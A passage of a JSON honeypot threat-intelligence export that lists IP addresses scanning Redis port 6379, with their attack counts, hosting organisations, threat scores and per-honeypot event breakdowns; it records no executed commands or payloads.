      "honeypot_breakdown_30d": {
        "Suricata": 8
      }
    },
    "167.94.138.131": {
      "attack_count": 5,
      "first_seen": "2026-03-19T19:27:36.000Z",
      "last_seen": "2026-03-19T19:28:36.512Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 45.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 16.7,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 47,
        "days_active_30d": 21,
        "ports_targeted_30d": 44,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T01:30:27.567000+00:00",
        "last_seen_30d": "2026-03-22T00:58:52.441000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 46,
        "Sentrypeer": 1
      }
    },
    "193.163.125.210": {
      "attack_count": 5,
      "first_seen": "2026-03-14T00:15:26.000Z",
      "last_seen": "2026-03-14T00:16:33.780Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": null,
      "asn": 211298,
      "as_org": "Driftnet Ltd",
      "threat_score": 28.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 15.3,
        "persistence": 7.5,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 34,
        "days_active_30d": 9,
        "ports_targeted_30d": 34,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-11T22:57:45.933000+00:00",
        "last_seen_30d": "2026-03-19T07:40:55.907000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Suricata": 34
      }
    },
    "193.163.125.74": {
      "attack_count": 5,
      "first_seen": "2026-03-11T00:10:51.000Z",
      "last_seen": "2026-03-11T00:11:55.290Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": null,
      "asn": 211298,
      "as_org": "Driftnet Ltd",
      "threat_score": 16.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 16.7,
        "persistence": 8.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 47,
        "days_active_30d": 10,
        "ports_targeted_30d": 46,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:21:58.818000+00:00",
        "last_seen_30d": "2026-03-11T05:01:51.438000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 47
      }
    },
    "194.127.165.69": {
      "attack_count": 5,
      "first_seen": "2026-03-18T05:00:06.000Z",
      "last_seen": "2026-03-18T05:01:40.174Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Vanuatu",
      "country_code": "VU",
      "city": null,
      "asn": 212512,
      "as_org": "Detai Prosperous Technologies Limited",
      "threat_score": 41.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 9.0,
        "persistence": 11.7,
        "diversity": 16,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 14,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-18T05:01:40.174000+00:00",
        "last_seen_30d": "2026-03-31T08:23:07.126000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 8
      }
    },
    "194.187.178.51": {
      "attack_count": 5,
      "first_seen": "2026-03-25T22:12:35.000Z",
      "last_seen": "2026-03-25T22:13:41.739Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Hong Kong",
      "country_code": "HK",
      "city": null,
      "asn": 215778,
      "as_org": "Alpha Strike Labs GmbH",
      "threat_score": 17.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 5.8,
        "diversity": 4,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 7,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-25T22:13:41.739000+00:00",
        "last_seen_30d": "2026-03-31T01:09:11.599000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "204.48.29.18": {
      "attack_count": 5,
      "first_seen": "2026-03-23T07:36:33.000Z",
      "last_seen": "2026-03-23T07:37:38.418Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 5.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-23T07:37:38.418000+00:00",
        "last_seen_30d": "2026-03-23T07:37:38.418000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "218.244.136.92": {
      "attack_count": 5,
      "first_seen": "2026-03-10T18:42:53.000Z",
      "last_seen": "2026-03-10T18:43:55.616Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 2.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T18:43:55.616000+00:00",
        "last_seen_30d": "2026-03-10T18:43:55.616000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "45.56.83.110": {
      "attack_count": 5,
      "first_seen": "2026-03-12T12:39:37.000Z",
      "last_seen": "2026-03-12T12:40:41.896Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 171,
        "days_active_30d": 30,
        "ports_targeted_30d": 158,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T05:26:23.213000+00:00",
        "last_seen_30d": "2026-03-31T19:04:32.004000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 171
      }
    },
    "45.79.109.130": {
      "attack_count": 5,
      "first_seen": "2026-03-02T12:37:03.000Z",
      "last_seen": "2026-03-02T12:38:04.412Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 73.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 23.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 211,
        "days_active_30d": 30,
        "ports_targeted_30d": 192,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T04:26:23.089000+00:00",
        "last_seen_30d": "2026-03-31T22:08:03.667000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 211
      }
    },
    "66.132.195.158": {
      "attack_count": 5,
      "first_seen": "2026-03-31T09:12:04.000Z",
      "last_seen": "2026-03-31T09:13:44.142Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 54.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 22.0,
        "persistence": 7.5,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 160,
        "days_active_30d": 9,
        "ports_targeted_30d": 150,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-23T23:51:55.891000+00:00",
        "last_seen_30d": "2026-03-31T17:22:02.230000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 160
      }
    },
    "159.223.189.243": {
      "attack_count": 4,
      "first_seen": "2026-03-28T13:35:24.000Z",
      "last_seen": "2026-03-28T13:36:33.761Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 64.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 1907,
        "days_active_30d": 2,
        "ports_targeted_30d": 1891,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-27T22:35:40.576000+00:00",
        "last_seen_30d": "2026-03-28T14:00:18.214000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1869,
        "Honeytrap": 35,
        "ConPot": 2,
        "Sentrypeer": 1
      }
    },
    "64.62.156.77": {
      "attack_count": 4,
      "first_seen": "2026-03-18T13:32:15.000Z",
      "last_seen": "2026-03-18T13:33:18.262Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Minneapolis",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 58.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.8,
        "persistence": 21.7,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 26,
        "ports_targeted_30d": 17,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T01:03:15.841000+00:00",
        "last_seen_30d": "2026-03-28T04:38:47.624000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 20,
        "Honeytrap": 4
      }
    },
    "65.49.1.165": {
      "attack_count": 4,
      "first_seen": "2026-03-07T14:41:21.000Z",
      "last_seen": "2026-03-07T14:42:28.794Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 63.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 10.4,
        "persistence": 25,
        "diversity": 18,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 11,
        "days_active_30d": 30,
        "ports_targeted_30d": 9,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T01:50:13+00:00",
        "last_seen_30d": "2026-03-31T04:03:39.617000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 9,
        "Honeytrap": 2
      }
    },
    "65.49.1.240": {
      "attack_count": 4,
      "first_seen": "2026-03-19T11:48:40.000Z",
      "last_seen": "2026-03-19T11:49:43.202Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 66.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 14.9,
        "persistence": 23.3,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 31,
        "days_active_30d": 28,
        "ports_targeted_30d": 19,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T13:44:16.431000+00:00",
        "last_seen_30d": "2026-03-30T07:51:59.226000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 25,
        "Honeytrap": 6
      }
    },
    "65.49.20.101": {
      "attack_count": 4,
      "first_seen": "2026-03-20T14:35:25.000Z",
      "last_seen": "2026-03-20T14:36:30.023Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 52.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 10.0,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 10,
        "days_active_30d": 21,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-11T02:08:56.144000+00:00",
        "last_seen_30d": "2026-03-31T05:37:41.556000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 10
      }
    },
    "172.110.223.51": {
      "attack_count": 1,
      "first_seen": "2026-03-07T16:57:46.720Z",
      "last_seen": "2026-03-07T16:57:46.720Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Hong Kong",
      "country_code": "HK",
      "city": null,
      "asn": 23470,
      "as_org": "ReliableSite.Net LLC",
      "threat_score": 15.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 30,
        "persistence": 4.2,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 57243,
        "days_active_30d": 5,
        "ports_targeted_30d": 61179,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T05:28:24.875000+00:00",
        "last_seen_30d": "2026-03-08T12:23:35.327000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Suricata": 57241,
        "Sentrypeer": 2
      }
    },
    "118.193.35.63": {
      "attack_count": 2478,
      "first_seen": "2026-03-30T04:35:07.000Z",
      "last_seen": "2026-03-30T05:34:46.931Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Hong Kong",
      "country_code": "HK",
      "city": "Hong Kong",
      "asn": 135377,
      "as_org": "UCLOUD INFORMATION TECHNOLOGY HK LIMITED",
      "threat_score": 48.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 2754,
        "days_active_30d": 1,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-30T04:35:18+00:00",
        "last_seen_30d": "2026-03-30T05:34:46.931000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 2052,
        "Cowrie": 483,
        "Suricata": 219
      }
    },
    "3.130.168.2": {
      "attack_count": 379,
      "first_seen": "2026-03-12T18:31:33.000Z",
      "last_seen": "2026-03-19T04:26:52.353Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 100,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 10333,
        "days_active_30d": 30,
        "ports_targeted_30d": 169,
        "honeypots_triggered_30d": 14,
        "first_seen_30d": "2026-03-02T03:20:36.823000+00:00",
        "last_seen_30d": "2026-03-31T21:11:53.082000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 6666,
        "Honeytrap": 3181,
        "Dionaea": 135,
        "Cowrie": 105,
        "Redishoneypot": 104,
        "Mailoney": 95,
        "Ipphoney": 9,
        "ConPot": 8,
        "Ciscoasa": 6,
        "ElasticPot": 6,
        "Tanner": 6,
        "Honeyaml": 5,
        "H0neytr4p": 4,
        "CitrixHoneypot": 3
      }
    },
    "45.205.1.110": {
      "attack_count": 95,
      "first_seen": "2026-03-17T22:49:38.000Z",
      "last_seen": "2026-03-18T08:43:34.704Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 215925,
      "as_org": "Vpsvault.host Ltd",
      "threat_score": 100,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 19126,
        "days_active_30d": 30,
        "ports_targeted_30d": 16,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T00:00:50+00:00",
        "last_seen_30d": "2026-03-31T23:37:22.139000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 10188,
        "Honeytrap": 8870,
        "Redishoneypot": 45,
        "Adbhoney": 18,
        "Honeyaml": 3,
        "Cowrie": 2
      }
    },
    "81.29.142.100": {
      "attack_count": 67,
      "first_seen": "2026-03-14T11:37:30.000Z",
      "last_seen": "2026-03-24T06:11:40.719Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": null,
      "asn": 210259,
      "as_org": "LLC Applied Computational Technologies",
      "threat_score": 83.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 21.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 6060,
        "days_active_30d": 26,
        "ports_targeted_30d": 71,
        "honeypots_triggered_30d": 13,
        "first_seen_30d": "2026-03-02T00:04:11.918000+00:00",
        "last_seen_30d": "2026-03-27T12:38:01.590000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3850,
        "Honeytrap": 1859,
        "Miniprint": 120,
        "Dionaea": 69,
        "Cowrie": 22,
        "H0neytr4p": 22,
        "Tanner": 22,
        "Redishoneypot": 21,
        "Ciscoasa": 18,
        "Ipphoney": 18,
        "Mailoney": 18,
        "ElasticPot": 15,
        "ConPot": 6
      }
    },
    "36.133.118.248": {
      "attack_count": 54,
      "first_seen": "2026-03-22T23:56:48.000Z",
      "last_seen": "2026-03-31T17:46:07.550Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 9808,
      "as_org": "China Mobile Communications Group Co., Ltd.",
      "threat_score": 34.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.8,
        "persistence": 8.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 10,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-22T23:56:49+00:00",
        "last_seen_30d": "2026-03-31T17:46:07.550000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 18,
        "Suricata": 6
      }
    },
    "160.187.107.47": {
      "attack_count": 52,
      "first_seen": "2026-03-06T05:53:55.000Z",
      "last_seen": "2026-03-27T08:02:05.088Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Indonesia",
      "country_code": "ID",
      "city": null,
      "asn": 153119,
      "as_org": "PT Intan Pariwara",
      "threat_score": 37.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.2,
        "persistence": 18.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 21,
        "days_active_30d": 22,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T05:55:03.704000+00:00",
        "last_seen_30d": "2026-03-27T08:02:05.088000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 15,
        "Suricata": 6
      }
    },
    "64.62.156.38": {
      "attack_count": 52,
      "first_seen": "2026-03-23T11:56:26.000Z",
      "last_seen": "2026-03-25T02:41:06.322Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Minneapolis",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.1,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.1,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 321,
        "days_active_30d": 30,
        "ports_targeted_30d": 89,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T03:05:34+00:00",
        "last_seen_30d": "2026-03-31T11:39:34.311000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 187,
        "Honeytrap": 91,
        "Redishoneypot": 22,
        "Adbhoney": 8,
        "Cowrie": 6,
        "ConPot": 5,
        "Dionaea": 2
      }
    },
    "74.82.47.2": {
      "attack_count": 52,
      "first_seen": "2026-03-21T14:21:32.000Z",
      "last_seen": "2026-03-31T12:08:10.325Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Gunnison",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.3,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 335,
        "days_active_30d": 30,
        "ports_targeted_30d": 77,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T14:09:47+00:00",
        "last_seen_30d": "2026-03-31T13:07:50.997000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 191,
        "Honeytrap": 106,
        "Redishoneypot": 22,
        "ConPot": 7,
        "Dionaea": 4,
        "Cowrie": 3,
        "Adbhoney": 2
      }
    },
    "163.223.13.184": {
      "attack_count": 45,
      "first_seen": "2026-03-02T04:40:34.000Z",
      "last_seen": "2026-03-19T15:31:53.218Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Vietnam",
      "country_code": "VN",
      "city": null,
      "asn": 153651,
      "as_org": "QPPF Company Limited",
      "threat_score": 24.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.0,
        "persistence": 15.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 18,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T04:40:34+00:00",
        "last_seen_30d": "2026-03-19T15:31:53.218000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 15,
        "Suricata": 5
      }
    },
    "143.198.75.35": {
      "attack_count": 40,
      "first_seen": "2026-03-11T15:28:55.000Z",
      "last_seen": "2026-03-13T03:36:35.732Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 32.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 5.0,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.4
      },
      "reputation_metrics": {
        "total_events_30d": 243075,
        "days_active_30d": 6,
        "ports_targeted_30d": 67979,
        "honeypots_triggered_30d": 16,
        "first_seen_30d": "2026-03-08T01:00:03.334000+00:00",
        "last_seen_30d": "2026-03-13T03:46:19.757000+00:00",
        "days_since_last_seen": 18
      },
      "honeypot_breakdown_30d": {
        "Suricata": 215033,
        "Honeytrap": 27940,
        "Dionaea": 23,
        "ConPot": 18,
        "Mailoney": 18,
        "Cowrie": 8,
        "Miniprint": 8,
        "Redishoneypot": 6,
        "Adbhoney": 4,
        "Dicompot": 3,
        "Ipphoney": 3,
        "ElasticPot": 2,
        "Honeyaml": 2,
        "Tanner": 2,
        "Medpot": 1
      }
    },
    "81.29.142.6": {
      "attack_count": 38,
      "first_seen": "2026-03-04T18:05:29.000Z",
      "last_seen": "2026-03-10T12:52:47.165Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": null,
      "asn": 210259,
      "as_org": "LLC Applied Computational Technologies",
      "threat_score": 83.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 21.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 3032,
        "days_active_30d": 26,
        "ports_targeted_30d": 66,
        "honeypots_triggered_30d": 12,
        "first_seen_30d": "2026-03-02T03:48:13+00:00",
        "last_seen_30d": "2026-03-27T03:04:01.809000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1987,
        "Honeytrap": 861,
        "Tanner": 47,
        "Cowrie": 41,
        "Dionaea": 23,
        "H0neytr4p": 17,
        "Ipphoney": 14,
        "Mailoney": 12,
        "Redishoneypot": 12,
        "Ciscoasa": 10,
        "ElasticPot": 6,
        "ConPot": 2
      }
    },
    "1.203.97.227": {
      "attack_count": 36,
      "first_seen": "2026-03-03T09:15:58.000Z",
      "last_seen": "2026-03-29T21:07:33.428Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4847,
      "as_org": "China Networks Inter-Exchange",
      "threat_score": 35.4,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 22.5,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 27,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T09:17:00.660000+00:00",
        "last_seen_30d": "2026-03-29T21:07:33.428000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "51.77.47.129": {
      "attack_count": 35,
      "first_seen": "2026-03-02T18:12:31.000Z",
      "last_seen": "2026-03-30T17:21:25.401Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Poland",
      "country_code": "PL",
      "city": "Warsaw",
      "asn": 16276,
      "as_org": "OVH SAS",
      "threat_score": 38.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 24.2,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 29,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T18:13:39.641000+00:00",
        "last_seen_30d": "2026-03-30T17:21:25.401000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "118.31.76.150": {
      "attack_count": 34,
      "first_seen": "2026-03-06T18:59:27.000Z",
      "last_seen": "2026-03-06T19:01:41.567Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 4.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 14.6,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.17
      },
      "reputation_metrics": {
        "total_events_30d": 29,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
